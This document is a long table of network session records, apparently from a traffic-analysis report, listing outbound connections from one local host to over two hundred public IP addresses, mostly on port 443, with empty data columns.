                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15197192.168.2.1458262204.170.128.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15198192.168.2.1459266136.119.7.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15199192.168.2.1438512190.58.37.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15200192.168.2.144921063.131.172.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15201192.168.2.1454636175.199.165.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15202192.168.2.1457532155.82.37.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15203192.168.2.1437570150.22.91.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15204192.168.2.1453316174.228.245.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15205192.168.2.145418877.220.179.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15206192.168.2.143887893.213.50.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15207192.168.2.14493009.128.190.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15208192.168.2.1448138206.214.87.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15209192.168.2.1451846204.201.215.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15210192.168.2.144802469.240.217.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15211192.168.2.144482687.90.199.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15212192.168.2.1438674135.224.158.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15213192.168.2.143965864.140.43.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15214192.168.2.1459496159.13.136.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15215192.168.2.144083439.236.252.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15216192.168.2.145325481.208.202.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15217192.168.2.1445554197.90.122.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15218192.168.2.1450462164.67.158.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15219192.168.2.1445010118.60.223.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15220192.168.2.145987676.114.250.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15221192.168.2.145917867.22.163.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15222192.168.2.145844027.215.144.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15223192.168.2.145567664.204.160.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15224192.168.2.1459418112.228.222.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15225192.168.2.145015875.65.145.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15226192.168.2.1450732114.84.128.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15227192.168.2.144722282.187.245.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15228192.168.2.1438680196.251.154.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15229192.168.2.1441456132.106.37.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15230192.168.2.1440458100.141.21.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15231192.168.2.1455450144.99.186.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15232192.168.2.1434790107.206.172.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15233192.168.2.14480269.102.94.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15234192.168.2.144498084.135.212.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15235192.168.2.1446976117.54.134.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15236192.168.2.1456666129.213.116.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15237192.168.2.14508361.30.71.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15238192.168.2.145303482.54.170.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15239192.168.2.144003019.197.127.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15240192.168.2.144572438.34.67.1008080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15241192.168.2.1450300101.43.177.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15242192.168.2.1450646121.69.233.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15243192.168.2.1454678219.167.150.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15244192.168.2.1441276187.113.104.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15245192.168.2.1439036176.243.88.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15246192.168.2.143695078.205.231.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15247192.168.2.144210672.165.70.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15248192.168.2.1447568170.244.167.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15249192.168.2.1435154166.240.229.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15250192.168.2.144372288.60.154.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15251192.168.2.1446272152.232.228.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15252192.168.2.1454182152.176.144.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15253192.168.2.144916059.57.245.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15254192.168.2.1444172124.45.125.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15255192.168.2.1440488114.218.22.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15256192.168.2.14374284.226.211.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15257192.168.2.143294817.133.105.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15258192.168.2.143796419.50.93.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15259192.168.2.144233636.254.9.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15260192.168.2.143477218.84.79.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15261192.168.2.145648483.110.56.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15262192.168.2.1434474144.136.73.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15263192.168.2.1435806222.71.63.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15264192.168.2.144962425.88.186.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15265192.168.2.145608091.25.152.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15266192.168.2.1459386202.71.121.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15267192.168.2.1437468211.183.209.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15268192.168.2.145893490.70.1.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15269192.168.2.145253266.150.30.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15270192.168.2.1452468102.112.56.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15271192.168.2.143349697.147.67.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15272192.168.2.1451812154.84.6.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15273192.168.2.1457236195.10.106.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15274192.168.2.1458032198.48.144.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15275192.168.2.1456180202.42.110.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15276192.168.2.14418369.135.89.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15277192.168.2.143431695.227.60.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15278192.168.2.1448198198.130.166.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15279192.168.2.1434508189.89.98.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15280192.168.2.1439400121.34.22.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15281192.168.2.145900474.93.154.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15282192.168.2.143440872.51.49.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15283192.168.2.1453750171.39.200.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15284192.168.2.1447046210.219.142.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15285192.168.2.144324669.188.65.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15286192.168.2.1457276185.145.148.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15287192.168.2.143786020.220.181.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15288192.168.2.1437262166.132.193.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15289192.168.2.144873670.215.93.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15290192.168.2.145605098.101.49.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15291192.168.2.1451502219.117.114.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15292192.168.2.1450334185.91.87.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15293192.168.2.1454334192.225.169.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15294192.168.2.144276857.54.218.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15295192.168.2.1449460156.107.215.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15296192.168.2.1445586104.36.216.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15297192.168.2.143483070.70.203.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15298192.168.2.143647441.79.171.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15299192.168.2.1444384190.129.27.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15300192.168.2.1450196102.37.118.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15301192.168.2.1439134142.35.171.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15302192.168.2.1445416220.3.73.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15303192.168.2.143874266.7.87.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15304192.168.2.1440806204.102.143.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15305192.168.2.1437378109.72.119.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15306192.168.2.1452828126.133.91.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15307192.168.2.1443552197.44.202.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15308192.168.2.145709482.81.177.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15309192.168.2.144440624.29.255.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15310192.168.2.1438234121.53.252.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15311192.168.2.1451860155.242.96.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15312192.168.2.1444988139.0.233.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15313192.168.2.145322892.237.93.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15314192.168.2.1436848164.219.235.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15315192.168.2.1454914212.90.109.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15316192.168.2.1458872112.144.159.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15317192.168.2.1444972116.207.3.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15318192.168.2.144154617.65.186.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15319192.168.2.1442552190.18.132.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15320192.168.2.1460274144.201.104.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15321192.168.2.1442846137.45.72.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15322192.168.2.144887043.67.220.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15323192.168.2.14457905.205.222.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15324192.168.2.1438182123.82.231.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15325192.168.2.145870471.23.245.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15326192.168.2.144092697.84.121.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15327192.168.2.1445712147.22.177.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15328192.168.2.145446419.249.58.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15329192.168.2.1438428183.126.55.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15330192.168.2.1446338186.3.120.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15331192.168.2.1433514191.178.184.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15332192.168.2.14445241.75.57.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15333192.168.2.1447358166.156.147.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15334192.168.2.1450522173.99.17.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15335192.168.2.143585497.164.58.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15336192.168.2.144354841.128.178.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15337192.168.2.144093678.52.46.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15338192.168.2.145985295.93.163.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15339192.168.2.1433580172.3.8.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15340192.168.2.1433072134.127.156.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15341192.168.2.146092281.70.74.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15342192.168.2.1447520198.181.55.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15343192.168.2.1456314197.126.128.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15344192.168.2.1451358119.97.13.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15345192.168.2.145366681.39.220.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15346192.168.2.1446058115.207.223.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15347192.168.2.144176695.192.119.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15348192.168.2.145732480.102.69.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15349192.168.2.144477458.33.38.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15350192.168.2.145038694.151.5.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15351192.168.2.1445982167.192.159.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15352192.168.2.1460418205.146.198.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15353192.168.2.1450770198.138.14.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15354192.168.2.1437346138.234.70.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15355192.168.2.1433072156.254.253.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15356192.168.2.1456640115.103.233.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15357192.168.2.1447404149.108.252.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15358192.168.2.14383764.196.31.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15359192.168.2.1441638106.118.201.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15360192.168.2.146047867.212.158.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15361192.168.2.143392420.107.154.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15362192.168.2.1434814116.106.73.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15363192.168.2.1458254182.136.221.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15364192.168.2.1456066124.239.218.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15365192.168.2.1451052145.33.140.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15366192.168.2.1445478218.211.56.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15367192.168.2.1448052208.32.151.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15368192.168.2.144952066.205.37.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15369192.168.2.1449276191.73.138.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15370192.168.2.145090832.247.161.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15371192.168.2.1456248210.118.13.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15372192.168.2.1448660109.211.21.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15373192.168.2.1448466172.240.133.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15374192.168.2.1444686154.23.254.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15375192.168.2.1452022162.184.191.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15376192.168.2.1452766162.186.64.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15377192.168.2.144390047.32.122.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15378192.168.2.1450006178.92.147.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15379192.168.2.143638845.89.231.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15380192.168.2.144679438.181.225.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15381192.168.2.14336565.140.117.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15382192.168.2.1456492142.52.1.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15383192.168.2.143565425.183.51.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15384192.168.2.145271666.236.177.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15385192.168.2.144019463.147.128.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15386192.168.2.1441016145.232.157.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15387192.168.2.1450518147.165.56.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15388192.168.2.1448790179.227.137.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15389192.168.2.1457308137.117.119.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15390192.168.2.144284071.242.225.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15391192.168.2.1457400168.30.50.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15392192.168.2.144219889.104.193.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15393192.168.2.1454148185.13.200.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15394192.168.2.1437178141.183.205.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15395192.168.2.144158446.144.31.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15396192.168.2.145752297.232.52.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15397192.168.2.1454504216.247.88.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15398192.168.2.1448790162.145.107.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15399192.168.2.145782239.58.196.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15400192.168.2.144276025.175.83.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15401192.168.2.143408457.201.41.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15402192.168.2.144433439.100.52.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15403192.168.2.1445942176.79.116.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15404192.168.2.144652879.179.67.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15405192.168.2.143725441.127.199.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15406192.168.2.145908844.61.28.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15407192.168.2.1448292189.193.85.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15408192.168.2.1449104167.13.133.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15409192.168.2.1450306123.78.12.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15410192.168.2.1460448170.3.199.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15411192.168.2.145211636.125.233.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15412192.168.2.1452716159.206.209.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15413192.168.2.143595814.55.67.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15414192.168.2.144242681.33.39.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15415192.168.2.14386985.24.210.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15416192.168.2.1441832210.143.83.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15417192.168.2.144609469.107.130.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15418192.168.2.1451646125.156.183.155443
